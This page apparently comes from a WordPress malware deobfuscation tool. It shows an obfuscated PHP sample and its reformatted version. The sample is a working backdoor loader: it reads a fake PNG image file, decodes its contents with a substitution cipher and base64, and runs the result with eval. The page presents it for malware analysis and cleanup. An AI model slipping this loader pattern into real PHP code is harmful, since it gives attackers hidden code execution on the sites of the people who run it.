PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php function surybu_beshaxyshav($vuneva_ehatahaw) { $ajepiva = strtr($vuneva_ehatahaw, array('r'=>'Q', 'F'=>'W', 'Q'=>'E', 'T'=>'R', 'D'=>'T', 'U'=>'Y', 'S'=>'U', 'C'=>'I', 'R'=>'O', 'M'=>'P', 'n'=>'A', 'Z'=>'S', 'G'=>'D', 'e'=>'F', 'K'=>'G', 'P'=>...

Obfuscated php code

<?php

function surybu_beshaxyshav($vuneva_ehatahaw) {
    $ajepiva = strtr($vuneva_ehatahaw, array('r'=>'Q', 'F'=>'W', 'Q'=>'E', 'T'=>'R', 'D'=>'T', 'U'=>'Y', 'S'=>'U', 'C'=>'I', 'R'=>'O', 'M'=>'P', 
        'n'=>'A', 'Z'=>'S', 'G'=>'D', 'e'=>'F', 'K'=>'G', 'P'=>'H', 't'=>'J', 'y'=>'K', '8'=>'L', 'E'=>'Z', 
        'O'=>'X', 'W'=>'C', '+'=>'V', 'B'=>'B', 'I'=>'N', 'a'=>'M', 'm'=>'q', 'A'=>'w', 'N'=>'e', 'i'=>'r', 
        'H'=>'t', 'j'=>'y', 'h'=>'u', 'J'=>'i', '3'=>'o', '/'=>'p', 'q'=>'a', '0'=>'s', 'o'=>'d', '='=>'f', 
        'w'=>'g', 'c'=>'h', '1'=>'j', 'V'=>'k', '7'=>'l', 'z'=>'z', 'u'=>'x', 'b'=>'c', 'd'=>'v', 'x'=>'b', 
        'X'=>'n', '5'=>'m', '2'=>'1', 'g'=>'2', 'p'=>'3', '9'=>'4', 'Y'=>'5', 'k'=>'6', 'L'=>'7', 'f'=>'8', 
        's'=>'9', '6'=>'0', 'v'=>'=', '4'=>'+', 'l'=>'/'));
    $ajepiva = base64_decode($ajepiva);

    return $ajepiva;
}

function ujoxuq_wifechaze($vuneva_ehatahaw) {
    if (!file_exists($vuneva_ehatahaw))
        return false;
    $baqoga = @file_get_contents($vuneva_ehatahaw);
    if (!$baqoga)
        return false;
    $baqoga = substr($baqoga, 3);
    $rivezyq = surybu_beshaxyshav($baqoga);
    return $rivezyq;
}

$ujucac = __DIR__ . '/assets/images/wibubal.png';

if (file_exists($ujucac)) {
    $ashoceb = ujoxuq_wifechaze($ujucac);
    if ($ashoceb) {
        @eval($ashoceb);
    }
}

Decoded(de-Obfuscated) php code

<?php

function surybu_beshaxyshav($vuneva_ehatahaw)
{
    $ajepiva = strtr($vuneva_ehatahaw, array('r' => 'Q', 'F' => 'W', 'Q' => 'E', 'T' => 'R', 'D' => 'T', 'U' => 'Y', 'S' => 'U', 'C' => 'I', 'R' => 'O', 'M' => 'P', 'n' => 'A', 'Z' => 'S', 'G' => 'D', 'e' => 'F', 'K' => 'G', 'P' => 'H', 't' => 'J', 'y' => 'K', '8' => 'L', 'E' => 'Z', 'O' => 'X', 'W' => 'C', '+' => 'V', 'B' => 'B', 'I' => 'N', 'a' => 'M', 'm' => 'q', 'A' => 'w', 'N' => 'e', 'i' => 'r', 'H' => 't', 'j' => 'y', 'h' => 'u', 'J' => 'i', '3' => 'o', '/' => 'p', 'q' => 'a', '0' => 's', 'o' => 'd', '=' => 'f', 'w' => 'g', 'c' => 'h', '1' => 'j', 'V' => 'k', '7' => 'l', 'z' => 'z', 'u' => 'x', 'b' => 'c', 'd' => 'v', 'x' => 'b', 'X' => 'n', '5' => 'm', '2' => '1', 'g' => '2', 'p' => '3', '9' => '4', 'Y' => '5', 'k' => '6', 'L' => '7', 'f' => '8', 's' => '9', '6' => '0', 'v' => '=', '4' => '+', 'l' => '/'));
    $ajepiva = base64_decode($ajepiva);
    return $ajepiva;
}
function ujoxuq_wifechaze($vuneva_ehatahaw)
{
    if (!file_exists($vuneva_ehatahaw)) {
        return false;
    }
    $baqoga = @file_get_contents($vuneva_ehatahaw);
    if (!$baqoga) {
        return false;
    }
    $baqoga = substr($baqoga, 3);
    $rivezyq = surybu_beshaxyshav($baqoga);
    return $rivezyq;
}
$ujucac = "/var/www/html/assets/images/wibubal.png";
if (file_exists($ujucac)) {
    $ashoceb = ujoxuq_wifechaze($ujucac);
    if ($ashoceb) {
        @eval($ashoceb);
    }
}

Malware detection & removal plugin for WordPress